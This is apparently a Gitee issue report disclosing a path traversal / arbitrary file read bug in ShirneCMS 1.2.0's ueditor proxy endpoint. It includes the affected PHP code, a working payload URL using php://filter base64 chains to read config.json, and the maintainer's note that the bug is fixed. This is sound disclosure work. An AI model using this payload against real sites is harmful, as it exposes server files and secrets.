72 Star 435 Fork 149

语辰软件 / ShirneCMS

 / 详情

shirne-1.2.0 exist path traversal bug

已完成
缺陷
创建于  
2022-07-31 15:39

This cms uses ueditor(A rich text editor) which is developed by Baidu(Top 100 Global Enterprises),and after the author's secondary development,an arbitrary file read vulnerability has occurred,details are as follows.

in the file/static/ueditor/php/controller.php,author add the proxy function which causes the Path Traversal Problem and could read any file on the system with cms installed.

controller.php

if(strlen($data) > 100){
 header("Content-type: image/jpeg");
 if($maxwidth > 0){
 $image = imagecreatefromstring($data);
 if($image){
 $width = imagesx($image);
 $height = imagesy($image);
 $sw=0;
 if($width > $height){
 if($width > $maxwidth){
 $sw = $maxwidth;
 $sh = $height * $sw / $width;
 }
 }else{
 if($height > $maxwidth){
 $sh = $maxwidth;
 $sw = $width * $sh / $height;
 }
 }
 if($sw > 0){
 $newimage = imagecreatetruecolor($sw,$sh);
 imagecopyresampled($newimage, $image, 0, 0, 0, 0, $sw, $sh,
$width, $height);
 
 imagejpeg($newimage,null,70);
 imagedestroy($newimage);
 }else{
 imagejpeg($image,null,70);
 }
 imagedestroy($image);
 }
 }else{
 echo $data;
 }
}

payload:

http://localhost/static/ueditor/php/controller.php?
action=proxy&remote=php://filter/convert.base64-encode|convert.base64-
encode|convert.base64-encode|convert.base64-encode|convert.base64-
encode|convert.base64-encode/resource=config.json&maxwidth=-1&referer=test

After several times base64-decode,you could see the real content.
If the author see this message, I hope you fix the vulnerability as soon as possible。

评论 (1)

HacKerQWQ 创建了缺陷
HacKerQWQ 修改了描述
展开全部操作日志

This issue has fixed in f83be2d

you can copy these files to override yours

shirne 任务状态从 待确认 修改为已完成

登录 后才可以发表评论

状态
负责人
项目
里程碑
Pull Requests
关联的 Pull Requests 被合并后可能会关闭此 issue
分支
开始日期   -   截止日期
-
置顶选项
优先级
预计工期 (小时)
参与者(2)
23652 shirne 1578915501
PHP
1
https://gitee.com/shirnecn/ShirneCMS.git
git@gitee.com:shirnecn/ShirneCMS.git
shirnecn
ShirneCMS
ShirneCMS

搜索帮助